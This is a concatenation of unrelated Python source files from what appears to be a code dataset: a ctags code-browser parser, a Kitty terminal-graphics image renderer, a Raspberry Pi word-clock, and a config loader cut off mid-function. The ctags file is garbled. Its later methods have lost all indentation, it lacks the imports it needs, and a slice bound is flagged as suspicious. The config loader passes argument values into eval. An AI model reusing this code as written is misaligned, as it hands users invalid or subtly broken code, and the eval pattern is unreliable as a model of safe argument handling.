import re
import subprocess
import tempfile
def iif(condition, trueVal, falseVal):
    """Inline-if helper: return trueVal when condition is truthy, else falseVal."""
    return trueVal if condition else falseVal
class ParserInterface:
    """Interface that code-browser parsers must implement."""
    def parse(self, doc):
        """Parse *doc* and return a tree of symbols, or None."""
        pass
    def cellrenderer(self, tvc, crt, ts, piter):
        """Configure the text cell renderer for the row at *piter*."""
        pass
    def pixbufrenderer(self, tvc, crp, ts, piter):
        """Configure the icon cell renderer for the row at *piter*."""
        crp.set_property("pixbuf", "default")
class CTagsParser(ParserInterface):
    def parse(self, doc):
        """Run ctags over *doc*'s text and return a gtk.TreeStore of tags.

        Returns None when the document has no language or a language that
        ctags cannot handle.
        """
        code = doc.get_text(*doc.get_bounds())
        lang = doc.get_language()
        if not lang:
            return None
        lang = self.__get_lang(lang.get_id())
        if not lang:
            return None
        tags = self.__generate_tags(code, lang)
        ts = self.__tags_to_ts(tags)
        return ts
    def cellrenderer(self, tvc, crt, ts, piter):
        # Render the tag name (tree-store column 0) in plain black text.
        text = ts.get_value(piter, 0)
        crt.set_property("foreground-gdk", gtk.gdk.Color(0, 0, 0))
        crt.set_property("text", text)
    def pixbufrenderer(self, tvc, crp, ts, piter):
        # Column 3 holds the icon name; fall back to the generic icon.
        try:
            icon = ts.get_value(piter, 3)
        except:
            icon = "default"
        crp.set_property("pixbuf", iconlib.pixbufs[icon])
    def __generate_tags(self, code, lang):
        """Write *code* to a temp file, run ctags on it, return the tags path.

        The caller is responsible for deleting the returned tags file.
        """
        hdl_code, tmp_code = tempfile.mkstemp()
        hdl_tags, tmp_tags = tempfile.mkstemp()
        os.close(hdl_code)
        os.close(hdl_tags)
        f = open(tmp_code, 'w')
        f.write(code)
        f.close()
        # NOTE(review): command string is run with shell=True; the only
        # interpolated paths come from mkstemp, the language id from our own
        # table, so no untrusted input reaches the shell here.
        cmd = "ctags --fields=-fst+Kn --sort=no --language-force=%s -f %s %s" %(lang, tmp_tags, tmp_code)
        subprocess.Popen(cmd, shell=True).wait()
        os.remove(tmp_code)
        return tmp_tags
#
# NOTE: CTags file format info at <http://ctags.sourceforge.net/ctags.html#TAG FILE FORMAT>
#
    def __tags_to_ts(self, tags):
        """Convert a ctags output file into a gtk.TreeStore and delete it.

        Columns: (tag name, file, line number, icon/kind name).  Nesting is
        inferred from the indentation of each tag's source-line address.
        """
        ts = gtk.TreeStore(str, str, int, str)
        ts.set_sort_column_id(2, gtk.SORT_ASCENDING)
        scopes = []
        indent = "INDENT_UNIT_IS_UNKNOWN"
        f = open(tags, 'r')
        for line in f.readlines():
            data = self.__get_line_data(line)
            if data:
                tagname = data[0]
                tagfile = data[1]
                tagaddress = data[2]
                tagkind = data[3]
                tagline = data[4]
                # learn the file's indent unit from the first indented tag
                if ( indent == "INDENT_UNIT_IS_UNKNOWN" ) and ( tagaddress.startswith(' ') or tagaddress.startswith('\t') ):
                    indent = self.__detect_indent_unit(tagaddress)
                lvl = tagaddress.count(indent)
                scopes = scopes[:lvl]
                parent = None
                if lvl > 0 and len(scopes) > 0:
                    parent = scopes[len(scopes) - 1]
                scopes.append( ts.append(parent , [ tagname, tagfile, tagline, tagkind ]) )
        f.close()
        os.remove(tags)
        return ts
    def __get_line_data(self, line):
        """Split one ctags line into [name, file, address, kind, lineno].

        Returns None for ctags pseudo-tag header lines ("!_...").
        """
        if line.startswith("!_"):
            return None
        tagaddress = re.findall(r'\/\^.*\$/;"', line)
        if len(tagaddress) > 0:
            tagaddress = tagaddress.pop()
        else:
            tagaddress = ""
        line = re.sub(r'\/\^.*\$/;"', 'TAG_ADDRESS_REMOVED', line)
        tokens = line.strip().split('\t')
        # NOTE(review): the slice end uses len(tokens[2]) -- the placeholder
        # string length -- rather than len(tagaddress); looks suspicious,
        # verify the intended bounds against real ctags output.
        tokens[2] = tagaddress[2:len(tokens[2])-4]# ignores regexp and vim compat hacks and get only the ... in /^...$/;"
        tokens[3] = self.__get_type(tokens[0], tokens[2], tokens[3])
        tokens[4] = int(tokens[4].strip().split(":").pop())
        return tokens
def __detect_indent_unit(self, line):
indent = []
for c in line:
if c.isspace():
indent.append(c)
else:
break
return ''.join(indent)
def __get_type(self, tagname, tagaddress, tagkind):
maps = {
"array" : "enum",
"class" : "class",
"constant" : "const",
"component" : "struct",
"database" : "database",
"db_index" : "db_index",
"db_procedure" : "db_procedure",
"db_table" : "db_table",
"db_trigger" : "db_trigger",
"db_type" : "db_type",
"db_template" : "db_template",
"db_view" : "db_view",
"define" : "typedef",
"enum constant" : "enum",
"enum" : "enum",
"enumerator" : "enum",
"event" : "event",
"externvar" : "field",
"feature" : "method",
"field" : "field",
"format" : "method",
"function" : "method",
"interface" : "interface",
"jsfunction" : "method",
"label" : "proc",
"local" : "field",
"macro" : "macro",
"member" : "method",
"method" : "method",
"module" : "namespace",
"mxtag" : "default",
"namelist" : "enum",
"namespace" : "namespace",
"object" : "object",
"package" : "namespace",
"property" : "prop",
"prototype" : "method",
"record" : "struct",
"set" : "field",
"singleton method" : "method",
"struct" : "struct",
"subroutine" : "proc",
"table" : "table",
"type" : "struct",
"typedef" : "typedef",
"union" : "union",
"variable" : "field"
}
try:
tagkind = maps[tagkind]
if tagname.startswith("_") or ( tagaddress.lower().find("private") > -1 ):
tagkind = "%s_priv"%tagkind
elif tagaddress.lower().find("protected") > -1:
tagkind = "%s_prot"%tagkind
except:
print "<<CodeBrowser>> Warning: Failed to find %s map. Cascading to default." % tagkind
tagkind = "default"
return tagkind
def __get_lang(self, lang):
maps = {
"ant" : "ant",
"asm" : "asm",
"asp" : "asp",
"awk" : "awk",
"basic" : "basic",
"beta" : "beta",
"c" : "c",
"c-sharp" : "c#",
"cpp" : "c++",
"cobol" : "cobol",
"dosbatch" : "dosbatch",
"eiffel" : "eiffel",
"erlang" : "erlang",
"flex" : "flex",
"fortran" : "fortran",
"html" : "html",
"java" : "java",
"js" : "js",
"lisp" : "lisp",
"lua" : "lua",
"makefile" : "make",
"matlab" : "matlab",
"objective-caml" : "ocaml",
"pascal" : "pascal",
"perl" : "perl",
"php" : "php",
"python" : "python",
"rexx" : "rexx",
"ruby" : "ruby",
"scheme" : "scheme",
"sh" : "sh",
"slang" : "slang",
"sml" : "sml",
"sql" : "sql",
"tcl" : "tcl",
"texinfo" : "tex",
"vera" : "vera",
"verilog" : "verilog",
"vhdl" : "vhdl",
"vim" : "vim",
"yacc" : "yacc"
}
try:
ctags_lang = maps[lang]
except:
ctags_lang = None
return ctags_lang
# ex:ts=4:et:
| 32.989209 | 124 | 0.43136 |
ace74aa5296865526b970ea8883bad1719f44582 | 11,666 | py | Python | term_image/image/kitty.py | AnonymouX47/term-img | d7d1079d458d11be18a49be0e6055b2ec4815323 | [
"MIT"
] | 18 | 2021-10-31T19:02:43.000Z | 2022-02-21T09:52:52.000Z | term_image/image/kitty.py | AnonymouX47/term-img | d7d1079d458d11be18a49be0e6055b2ec4815323 | [
"MIT"
] | 3 | 2022-01-30T03:01:14.000Z | 2022-03-29T09:51:57.000Z | term_image/image/kitty.py | AnonymouX47/term-img | d7d1079d458d11be18a49be0e6055b2ec4815323 | [
"MIT"
] | 1 | 2022-01-30T14:07:59.000Z | 2022-01-30T14:07:59.000Z | from __future__ import annotations
__all__ = ("KittyImage",)
import io
import os
import sys
from base64 import standard_b64encode
from dataclasses import asdict, dataclass
from math import ceil
from operator import mul
from subprocess import run
from typing import Generator, Optional, Set, Tuple, Union
from zlib import compress, decompress
import PIL
from ..utils import get_cell_size, lock_tty, query_terminal
from .common import GraphicsImage
# Constants for ``KittyImage`` render method
LINES = "lines"
WHOLE = "whole"
class KittyImage(GraphicsImage):
"""A render style using the Kitty terminal graphics protocol.
See :py:class:`GraphicsImage` for the complete description of the constructor.
**Render Methods:**
:py:class:`KittyImage` provides two methods of :term:`rendering` images, namely:
lines
Renders an image line-by-line i.e the image if evenly split up across
the number of line it should occupy and all portions is joined together by
``\\n`` (newline sequence) to give the whole image.
Pros:
* Good for use cases where it might be required to trim some lines of the
image.
whole
Renders an image all at once i.e the entire image data is encoded into the first
line of the :term:`rendered` output, such that the entire image is drawn once
by the terminal and still occupies the proper amount of lines and columns.
Pros:
* Render results are less in number of characters compared to the
``lines`` method since the entire image is encoded at once.
* Better for non-animated images that are large in resolution and pixel
density as images are drawn once.
The render method can be set with
:py:meth:`set_render_method() <BaseImage.set_render_method>` using the names
specified above.
ATTENTION:
Currently supported terminal emulators include:
* `Kitty <https://sw.kovidgoyal.net/kitty/>`_ >= 0.20.0.
* `Konsole <https://konsole.kde.org>`_ >= 22.04.0.
"""
_render_methods: Set[str] = {LINES, WHOLE}
_default_render_method: str = LINES
_render_method: str = LINES
    @classmethod
    @lock_tty
    def is_supported(cls):
        """Return True when the terminal answers the kitty graphics query and
        identifies as kitty >= 0.20.0 or Konsole >= 22.04.0 (cached)."""
        if cls._supported is None:
            # Kitty graphics query + terminal attribute query
            # The second query is to speed up the query since most (if not all)
            # terminals should support it and most terminals treat queries as FIFO
            response = query_terminal(
                (
                    f"{_START}a=q,t=d,i=31,f=24,s=1,v=1,C=1,c=1,r=1;AAAA{_END}\033[c"
                ).encode(),
                lambda s: not s.endswith(b"c"),
            )
            # Not supported if it doesn't respond to either query
            # or responds to the second but not the first
            cls._supported = response and (
                response.rpartition(b"\033")[0] == f"{_START}i=31;OK{_END}".encode()
            )
            # Currently, only kitty >= 0.20.0 and Konsole 22.04.0 implement the
            # protocol features utilized
            if cls._supported:
                result = run(
                    "kitty +kitten query-terminal --wait-for=0.1 name version",
                    shell=True,
                    text=True,
                    capture_output=True,
                )
                name, version = map(
                    lambda query: query.partition(" ")[2], result.stdout.split("\n", 1)
                )
                cls._supported = (
                    not result.returncode
                    and name == "xterm-kitty"
                    and tuple(map(int, version.split("."))) >= (0, 20, 0)
                    or int(os.environ.get("KONSOLE_VERSION", "0")) >= 220400
                )
        return cls._supported
    @classmethod
    def _clear_images(cls):
        # Delete all on-screen images via the graphics protocol (action a=d).
        _stdout_write(b"\033_Ga=d;\033\\")
        return True
    def _get_render_size(self) -> Tuple[int, int]:
        # Rendered size in pixels: (cols, lines) scaled by the cell size,
        # falling back to a 1x2 cell when the real size is unavailable.
        return tuple(map(mul, self.rendered_size, get_cell_size() or (1, 2)))
@staticmethod
def _pixels_cols(
*, pixels: Optional[int] = None, cols: Optional[int] = None
) -> int:
return (
ceil(pixels // (get_cell_size() or (1, 2))[0])
if pixels is not None
else cols * (get_cell_size() or (1, 2))[0]
)
@staticmethod
def _pixels_lines(
*, pixels: Optional[int] = None, lines: Optional[int] = None
) -> int:
return (
ceil(pixels // (get_cell_size() or (1, 2))[1])
if pixels is not None
else lines * (get_cell_size() or (1, 2))[1]
)
    def _render_image(
        self, img: PIL.Image.Image, alpha: Union[None, float, str]
    ) -> str:
        """Encode *img* for the kitty graphics protocol and delegate to the
        active render method (``lines`` or ``whole``)."""
        # Using `c` and `r` ensures that an image always occupies the correct amount
        # of columns and lines even if the cell size has changed when it's drawn.
        # Since we use `c` and `r` control data keys, there's no need upscaling the
        # image on this end; ensures minimal payload.
        render_size = self._get_render_size()
        r_width, r_height = self.rendered_size
        width, height = (
            render_size
            if mul(*render_size) < mul(*self._original_size)
            else self._original_size
        )
        # When `_original_size` is used, ensure the height is a multiple of the rendered
        # height, so that pixels can be evenly distributed among all lines.
        # If r_height == 0, height == 0, extra == 0; Handled in `_get_render_data()`.
        extra = height % (r_height or 1)
        if extra:
            # Incremented to the greater multiple to avoid losing any data
            height = height - extra + r_height
        img = self._get_render_data(img, alpha, size=(width, height))[0]
        format = getattr(f, img.mode)
        raw_image = img.tobytes()
        # clean up
        if img is not self._source:
            img.close()
        return getattr(self, f"_render_image_{self._render_method}")(
            raw_image, format, width, height, r_width, r_height
        )
    @staticmethod
    def _render_image_lines(
        raw_image: bytes,
        format: int,
        width: int,
        height: int,
        r_width: int,
        r_height: int,
    ) -> str:
        """Render the image as one graphics escape per terminal line, joined
        by newlines; each escape carries one cell-row of pixel data."""
        # NOTE:
        # It's more efficient to write separate strings to the buffer separately
        # than concatenate and write together.
        cell_height = height // r_height
        bytes_per_line = width * cell_height * (format // 8)
        with io.StringIO() as buffer, io.BytesIO(raw_image) as raw_image:
            control_data = ControlData(f=format, s=width, v=cell_height, c=r_width, r=1)
            trans = Transmission(control_data, raw_image.read(bytes_per_line))
            fill = " " * r_width
            buffer.write(trans.get_chunked())
            # Writing spaces clears any text under transparent areas of an image
            for _ in range(r_height - 1):
                buffer.write(fill + "\n")
                trans = Transmission(control_data, raw_image.read(bytes_per_line))
                buffer.write(trans.get_chunked())
            buffer.write(fill)
            return buffer.getvalue()
    @staticmethod
    def _render_image_whole(
        raw_image: bytes,
        format: int,
        width: int,
        height: int,
        r_width: int,
        r_height: int,
    ) -> str:
        """Render the whole image as a single escape on the first line, padded
        with spaces/newlines so it still occupies r_width x r_height cells."""
        return (
            Transmission(
                ControlData(f=format, s=width, v=height, c=r_width, r=r_height),
                raw_image,
            ).get_chunked()
            + (" " * r_width + "\n") * (r_height - 1)
            + " " * r_width
        )
@dataclass
class Transmission:
    """An abstraction of the kitty terminal graphics escape code.

    Args:
        control: The control data.
        payload: The raw (pre-encoding) payload bytes.
    """
    control: ControlData
    payload: bytes
    def __post_init__(self):
        # compress eagerly when the control data already asks for zlib
        self._compressed = False
        if self.control.o == o.ZLIB:
            self.compress()
    def compress(self):
        """Zlib-compress the payload in place (direct transmission only)."""
        if self.control.t == t.DIRECT and not self._compressed:
            self.payload = compress(self.payload)
            self.control.o = o.ZLIB
            self._compressed = True
    def decompress(self):
        """Undo :meth:`compress`, restoring the raw payload."""
        if self.control.t == t.DIRECT and self._compressed:
            self.control.o = None
            self.payload = decompress(self.payload)
            self._compressed = False
    def encode(self) -> bytes:
        """Return the payload encoded in standard base64."""
        return standard_b64encode(self.payload)
    def get_chunked(self) -> str:
        """Return the full escape-code sequence as a single string."""
        return "".join(self.get_chunks())
    def get_chunks(self, size: int = 4096) -> Generator[str, None, None]:
        """Yield the escape code split into *size*-byte payload chunks.

        The first chunk carries the control data; ``m`` flags continuation.
        """
        payload = self.get_payload()
        chunk, next_chunk = payload.read(size), payload.read(size)
        yield f"\033_G{self.get_control_data()},m={bool(next_chunk):d};{chunk}\033\\"
        chunk, next_chunk = next_chunk, payload.read(size)
        while next_chunk:
            yield f"\033_Gm=1;{chunk}\033\\"
            chunk, next_chunk = next_chunk, payload.read(size)
        if chunk: # false if there was never a next chunk
            yield f"\033_Gm=0;{chunk}\033\\"
    def get_control_data(self) -> str:
        """Serialize the non-None control-data keys as ``k=v`` pairs."""
        return ",".join(
            f"{key}={value}"
            for key, value in asdict(self.control).items()
            if value is not None
        )
    def get_payload(self) -> io.StringIO:
        """Return the base64-encoded payload wrapped in a text stream."""
        return io.StringIO(self.encode().decode("ascii"))
# Values for control data keys with limited set of values
class a:
    """Values for the ``a`` (action) control key."""
    TRANS = "t"
    TRANS_DISP = "T"
    QUERY = "q"
    PLACE = "p"
    DELETE = "d"
    TRANS_FRAMES = "f"
    CONTROL_ANIM = "a"
    COMPOSE_FRAMES = "c"
class C:
    """Values for the ``C`` (cursor movement policy) control key."""
    MOVE = 0
    STAY = 1
class f:
    """Values for the ``f`` (pixel data format) control key."""
    RGB = 24
    RGBA = 32
    PNG = 100
class o:
    """Values for the ``o`` (compression) control key."""
    ZLIB = "z"
class t:
    """Values for the ``t`` (transmission medium) control key."""
    DIRECT = "d"
    FILE = "f"
    TEMP = "t"
    SHARED = "s"
class z:
    """Values for the ``z`` (z-index relative to text) control key."""
    BEHIND = -1
    IN_FRONT = 0
@dataclass
class ControlData:
    """Represents a portion of the kitty terminal graphics protocol control data"""
    a: Optional[str] = a.TRANS_DISP  # action
    f: Optional[int] = f.RGBA  # data format
    t: Optional[str] = t.DIRECT  # transmission medium
    s: Optional[int] = None  # image width
    v: Optional[int] = None  # image height
    z: Optional[int] = z.IN_FRONT  # z-index
    o: Optional[str] = o.ZLIB  # compression
    C: Optional[int] = C.STAY  # cursor movement policy
    # # Image display size in columns and rows/lines
    # # The image is shrunk or enlarged to fit
    c: Optional[int] = None  # columns
    r: Optional[int] = None  # rows
    def __post_init__(self):
        # PNG payloads carry their own dimensions; drop explicit width/height
        if self.f == f.PNG:
            self.s = self.v = None
class _ControlData: # Currently Unused
    """Remaining protocol control keys, kept for reference only."""
    i: Optional[int] = None  # image ID
    d: Optional[str] = None  # delete images
    m: Optional[int] = None  # payload chunk
    O: Optional[int] = None  # data start offset; with t=s or t=f
    S: Optional[int] = None  # data size in bytes; with f=100,o=z or t=s or t=f
    # Origin offset (px) within the current cell; Must be less than the cell size
    # (0, 0) == Top-left corner of the cell; Not used with `c` and `r`.
    X: Optional[int] = None
    Y: Optional[int] = None
    # Image crop (px)
    # # crop origin; (0, 0) == top-left corner of the image
    x: Optional[int] = None
    y: Optional[int] = None
    # # crop rectangle size
    w: Optional[int] = None
    h: Optional[int] = None
_START = "\033_G"
_END = "\033\\"
_FMT = f"{_START}%(control)s;%(payload)s{_END}"
_stdout_write = sys.stdout.buffer.write
| 30.944297 | 88 | 0.590605 |
ace74ba230fe0cbc91752f2fa069b5b1562b6a3a | 10,877 | py | Python | clock.py | ThomasMoellerR/11_01_rpi_wordclock | cf58bd46eb5cfe6eaf79479176741e655064f2bf | [
"MIT"
] | null | null | null | clock.py | ThomasMoellerR/11_01_rpi_wordclock | cf58bd46eb5cfe6eaf79479176741e655064f2bf | [
"MIT"
] | null | null | null | clock.py | ThomasMoellerR/11_01_rpi_wordclock | cf58bd46eb5cfe6eaf79479176741e655064f2bf | [
"MIT"
] | null | null | null | import numpy as np
import colorsys
import random
def grad_to_rgb(grad):
    """Map a hue angle in degrees (0..360) to an (r, g, b) triple in 0..255."""
    rgb = np.asarray(colorsys.hsv_to_rgb(grad / 360, 1.0, 1.0)) * 255
    return rgb[0], rgb[1], rgb[2]
class wordclock:
wordidx = {}
wordidx["es"] = (0,1)
wordidx["ist"] = (3,4,5)
wordidx["funf"] = (7,8,9,10)
wordidx["zehn"] = (11,12,13,14)
wordidx["zwanzig"] = (15,16,17,18,19,20,21)
wordidx["drei"] = (22,23,24,25)
wordidx["viertel"] = (26,27,28,29,30,31,32)
wordidx["nach"] = (35,36,37,38)
wordidx["vor"] = (39,40,41)
wordidx["halb"] = (44,45,46,47)
wordidx["zwolf"] = (49,50,51,52,53)
wordidx["zw"] = (55,56)
wordidx["ei"] = (57,58)
wordidx["n"] = (59,)
wordidx["s"] = (60,)
wordidx["ieben"] = (61,62,63,64,65)
wordidx["drei_2"] = (67,68,69,70)
wordidx["funf_2"] = (73,74,75,76)
wordidx["elf"] = (77,78,79)
wordidx["neun"] = (80,81,82,83)
wordidx["vier"] = (84,85,86,87)
wordidx["acht"] = (89,90,91,92)
wordidx["zehn_2"] = (93,94,95,96)
wordidx["sechs"] = (100,101,102,103,104)
wordidx["uhr"] = (107,108,109)
wordidx["1min"] = (113,)
wordidx["2min"] = (110,)
wordidx["3min"] = (111,)
wordidx["4min"] = (112,)
    def __init__(self):
        """Initialise display mode, brightness and the three pixel maps."""
        self.mode = "WORD_RANDOM_COLOR"
        self.brightness = 1.0
        # word id each of the 114 LEDs belongs to (0 == LED off)
        self.uniquewords_pixelmap = np.zeros((114), dtype=np.uint8)
        # per-LED RGB colour before brightness scaling
        self.rgb_pixelmap = np.zeros((114,3), dtype=np.uint8)
        # per-LED RGB colour after brightness scaling (what gets displayed)
        self.rgb_brightness_pixelmap = np.zeros((114,3), dtype=np.uint8)
        self.fixed_color = (0,255,0)
    def no_time_availabe(self):
        # NOTE: name keeps its original misspelling for caller compatibility.
        """Blank the display (all LEDs off) when no time can be shown."""
        self.rgb_brightness_pixelmap = np.zeros((114,3), dtype=np.uint8)
        #color = (255,255,255)
        #self.rgb_brightness_pixelmap[110] = color
        #self.rgb_brightness_pixelmap[111] = color
        #self.rgb_brightness_pixelmap[112] = color
        #self.rgb_brightness_pixelmap[113] = color
    def get_pixelmap(self):
        """Return the displayed pixel map as a plain nested list."""
        return self.rgb_brightness_pixelmap.tolist()
    def set_color (self, color):
        """Set the fixed (r, g, b) colour used by SAME_COLOR and TEST modes."""
        self.fixed_color = color
    def set_mode(self, mode):
        """Select the display mode (e.g. SAME_COLOR, WORD_RANDOM_COLOR)."""
        self.mode = mode
    def set_brightness(self, brightness):
        """Set the global brightness (0.0..1.0) and rescale the output map."""
        self.brightness = brightness
        self.fill_rgb_brightness_pixelmap()
    def set_time(self, hours, minutes):
        """Recompute the word map for the given time (word-based modes only)."""
        if self.mode == "SAME_COLOR" or self.mode == "WORD_RANDOM_COLOR" or self.mode == "CHARACTER_RANDOM_COLOR":
            self.calcualte_uniquewords_pixelmap(hours, minutes)
    def update(self):
        """Recompute colours and brightness scaling for the current state."""
        self.fill_rgb_pixelmap()
        self.fill_rgb_brightness_pixelmap()
    def fill_rgb_pixelmap(self):
        """Assign a base colour to every lit LED according to the mode."""
        if self.mode == "SAME_COLOR" or self.mode == "WORD_RANDOM_COLOR" or self.mode == "CHARACTER_RANDOM_COLOR":
            self.rgb_pixelmap = np.zeros((114,3), dtype=np.uint8)
            # iterate over every word id currently present (0 == LED off)
            for i in np.trim_zeros(np.unique(self.uniquewords_pixelmap)):
                for j in np.where(self.uniquewords_pixelmap == i):
                    if self.mode == "SAME_COLOR":
                        for k in j:
                            self.rgb_pixelmap[k] = self.fixed_color
                    if self.mode == "WORD_RANDOM_COLOR":
                        # one random hue per word
                        grad = random.choice(np.arange(0,360,1))
                        r,g,b = grad_to_rgb(grad)
                        for k in j:
                            self.rgb_pixelmap[k] = (r,g,b)
                    if self.mode == "CHARACTER_RANDOM_COLOR":
                        # one random hue per individual LED
                        for k in j:
                            grad = random.choice(np.arange(0,360,1))
                            r,g,b = grad_to_rgb(grad)
                            self.rgb_pixelmap[k] = (r,g,b)
        if self.mode == "TEST":
            for i in range(len(self.rgb_pixelmap)):
                self.uniquewords_pixelmap[i] = 1 # non-zero, so the LED counts as lit
                self.rgb_pixelmap[i] = self.fixed_color
def fill_rgb_brightness_pixelmap(self):
self.rgb_brightness_pixelmap = np.zeros((114,3), dtype=np.uint8)
for i in range(len(self.uniquewords_pixelmap)):
if self.uniquewords_pixelmap[i] != 0:
h,s,v = colorsys.rgb_to_hsv(self.rgb_pixelmap[i][0] / 255, self.rgb_pixelmap[i][1] / 255, self.rgb_pixelmap[i][2] / 255)
v = self.brightness
r,g,b = colorsys.hsv_to_rgb(h,s,v)
self.rgb_brightness_pixelmap[i][0] = r * 255
self.rgb_brightness_pixelmap[i][1] = g * 255
self.rgb_brightness_pixelmap[i][2] = b * 255
def set_pixel(self, words, increase_counter):
if increase_counter: self.uncounter += 1
for i in words: self.uniquewords_pixelmap[i] = self.uncounter
def calcualte_uniquewords_pixelmap(self, hours, minutes):
self.uniquewords_pixelmap = np.zeros((114), dtype=np.uint8)
self.uncounter = 0
# Immer
self.set_pixel(wordclock.wordidx["es"], 1)
self.set_pixel(wordclock.wordidx["ist"], 1)
self.set_pixel(wordclock.wordidx["uhr"], 1)
# Stunden
if hours == 0 or hours == 12 or hours == 24:
if minutes < 25:
self.set_pixel(wordclock.wordidx["zwolf"], 1)
else:
self.set_pixel(wordclock.wordidx["ei"], 1)
self.set_pixel(wordclock.wordidx["n"], 0)
self.set_pixel(wordclock.wordidx["s"], 0)
if hours == 1 or hours == 13:
if minutes < 25:
self.set_pixel(wordclock.wordidx["ei"], 1)
self.set_pixel(wordclock.wordidx["n"], 0)
self.set_pixel(wordclock.wordidx["s"], 0)
else:
self.set_pixel(wordclock.wordidx["zw"], 1)
self.set_pixel(wordclock.wordidx["ei"], 0)
if hours == 2 or hours == 14:
if minutes < 25:
self.set_pixel(wordclock.wordidx["zw"], 1)
self.set_pixel(wordclock.wordidx["ei"], 0)
else:
self.set_pixel(wordclock.wordidx["drei_2"], 1)
if hours == 3 or hours == 15:
if minutes < 25:
self.set_pixel(wordclock.wordidx["drei_2"], 1)
else:
self.set_pixel(wordclock.wordidx["vier"], 1)
if hours == 4 or hours == 16:
if minutes < 25:
self.set_pixel(wordclock.wordidx["vier"], 1)
else:
self.set_pixel(wordclock.wordidx["funf_2"], 1)
if hours == 5 or hours == 17:
if minutes < 25:
self.set_pixel(wordclock.wordidx["funf_2"], 1)
else:
self.set_pixel(wordclock.wordidx["sechs"], 1)
if hours == 6 or hours == 18:
if minutes < 25:
self.set_pixel(wordclock.wordidx["sechs"], 1)
else:
self.set_pixel(wordclock.wordidx["s"], 1)
self.set_pixel(wordclock.wordidx["ieben"], 0)
if hours == 7 or hours == 19:
if minutes < 25:
self.set_pixel(wordclock.wordidx["s"], 1)
self.set_pixel(wordclock.wordidx["ieben"], 0)
else:
self.set_pixel(wordclock.wordidx["acht"], 1)
if hours == 8 or hours == 20:
if minutes < 25:
self.set_pixel(wordclock.wordidx["acht"], 1)
else:
self.set_pixel(wordclock.wordidx["neun"], 1)
if hours == 9 or hours == 21:
if minutes < 25:
self.set_pixel(wordclock.wordidx["neun"], 1)
else:
self.set_pixel(wordclock.wordidx["zehn_2"], 1)
if hours == 10 or hours == 22:
if minutes < 25:
self.set_pixel(wordclock.wordidx["zehn_2"], 1)
else:
self.set_pixel(wordclock.wordidx["elf"], 1)
if hours == 11 or hours == 23:
if minutes < 25:
self.set_pixel(wordclock.wordidx["elf"], 1)
else:
self.set_pixel(wordclock.wordidx["zwolf"], 1)
# 5 Mintuen Schritte
if minutes >= 0 and minutes <= 4:
pass
if minutes >= 5 and minutes <= 9:
self.set_pixel(wordclock.wordidx["funf"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
if minutes >= 10 and minutes <= 14:
self.set_pixel(wordclock.wordidx["zehn"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
if minutes >= 15 and minutes <= 19:
self.set_pixel(wordclock.wordidx["viertel"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
if minutes >= 20 and minutes <= 24:
self.set_pixel(wordclock.wordidx["zwanzig"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
if minutes >= 25 and minutes <= 29:
self.set_pixel(wordclock.wordidx["funf"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
self.set_pixel(wordclock.wordidx["halb"], 1)
if minutes >= 30 and minutes <= 34:
self.set_pixel(wordclock.wordidx["halb"], 1)
if minutes >= 35 and minutes <= 39:
self.set_pixel(wordclock.wordidx["funf"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
self.set_pixel(wordclock.wordidx["halb"], 1)
if minutes >= 40 and minutes <= 44:
self.set_pixel(wordclock.wordidx["zwanzig"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
if minutes >= 45 and minutes <= 49:
self.set_pixel(wordclock.wordidx["viertel"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
if minutes >= 50 and minutes <= 54:
self.set_pixel(wordclock.wordidx["zehn"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
if minutes >= 55 and minutes <= 59:
self.set_pixel(wordclock.wordidx["funf"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
# Minuten
for j in range(1,60,5):
if minutes == j:
self.set_pixel(wordclock.wordidx["1min"], 1)
break
for j in range(2,60,5):
if minutes == j:
self.set_pixel(wordclock.wordidx["1min"], 1)
self.set_pixel(wordclock.wordidx["2min"], 1)
break
for j in range(3,60,5):
if minutes == j:
self.set_pixel(wordclock.wordidx["1min"], 1)
self.set_pixel(wordclock.wordidx["2min"], 1)
self.set_pixel(wordclock.wordidx["3min"], 1)
break
for j in range(4,60,5):
if minutes == j:
self.set_pixel(wordclock.wordidx["1min"], 1)
self.set_pixel(wordclock.wordidx["2min"], 1)
self.set_pixel(wordclock.wordidx["3min"], 1)
self.set_pixel(wordclock.wordidx["4min"], 1)
break
| 35.662295 | 136 | 0.542153 |
ace74d8f44224fba300f1408e5faf94ab7c3e34e | 3,918 | py | Python | common/config.py | eyextent/airCombateRL | 6b347a5abeef42a30b049de367e6c82403f1b7d2 | [
"MIT"
] | 9 | 2019-11-25T11:19:02.000Z | 2021-10-20T12:23:11.000Z | common/config.py | hedingjie/AirCombateRL | 6b347a5abeef42a30b049de367e6c82403f1b7d2 | [
"MIT"
] | 2 | 2020-11-02T07:06:03.000Z | 2021-01-18T03:51:30.000Z | common/config.py | hedingjie/AirCombateRL | 6b347a5abeef42a30b049de367e6c82403f1b7d2 | [
"MIT"
] | 11 | 2019-11-28T14:04:29.000Z | 2022-03-30T09:04:41.000Z | import numpy as np
import yaml
from easydict import EasyDict as edict
import os
import argparse
import datetime
from common.utlis import judge_type
import pprint
from sacred.observers import FileStorageObserver
base_dir = os.path.dirname(os.path.dirname(__file__))
#print(base_dir)
dict = edict()
def cfg_from_file(subfolder,filename):
if filename=='None':
return
with open(os.path.join(base_dir,"argument",subfolder,"{}.yaml".format(filename)),'r',encoding='utf-8') as f:
yaml_cfg = edict(yaml.load(f,Loader=yaml.FullLoader))
return yaml_cfg
def merge(param):
for key,value in param.items():
if param[key]=='None':
continue
else:
dict.update(cfg_from_file(key,value))
# print(dict)
return dict
def args_wrapper_parser(args):
'''
将字典形式的参数解析到 argparse 中,方便命令行传参
'''
parser = argparse.ArgumentParser()
for key, value in args.items():
tp = judge_type(value)
if tp == 'list':
eval("parser.add_argument('--%s', default='%s')"%(key, value))
else:
eval("parser.add_argument('--%s', type=%s, default='%s')"%(key, tp, value))
args = parser.parse_args()
return args
def args_wrapper_path(args, last_path):
'''
主要是对重复训练的保存路径进行封装
'''
# data_path_suffix_date = datetime.datetime.now().strftime('_%Y-%m-%d')
if last_path is None:
# args.save_path = args.source_path + '/' + args.experiment_name + data_path_suffix_date + '/'
